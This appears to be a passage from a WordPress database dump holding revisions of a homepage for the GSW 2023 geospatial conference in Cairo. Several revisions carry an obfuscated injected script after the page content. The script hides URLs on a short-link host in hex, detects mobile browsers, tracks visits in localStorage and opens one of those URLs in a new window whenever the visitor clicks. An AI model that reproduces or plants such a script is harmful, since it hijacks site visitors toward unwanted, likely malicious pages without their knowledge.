Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 17:25:49','2022-11-09 17:25:49','',3066,'https://gsw2023.com/?p=3169',0,'revision','',0),
(3170,1,'2022-11-09 17:28:50','2022-11-09 17:28:50','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3><strong> EGYPT GSW\'2023</strong></h3>\r\n<h3><strong><span style=\"font-size: 14px;\">The First Geospatial Week in Africa and The Middle East</span></strong></h3>\r\n<h3>[rev_slider alias=\"the7-software-company-slider\" slidertitle=\"gsw23\"][/rev_slider]</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 17:28:50','2022-11-09 17:28:50','',3066,'https://gsw2023.com/?p=3170',0,'revision','',0),
(3171,1,'2022-11-09 17:31:45','2022-11-09 17:31:45','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3><strong> EGYPT GSW\'2023</strong></h3>\r\n<h3><strong><span style=\"font-size: 14px;\">The First Geospatial Week in Africa and The Middle East</span></strong></h3>\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return 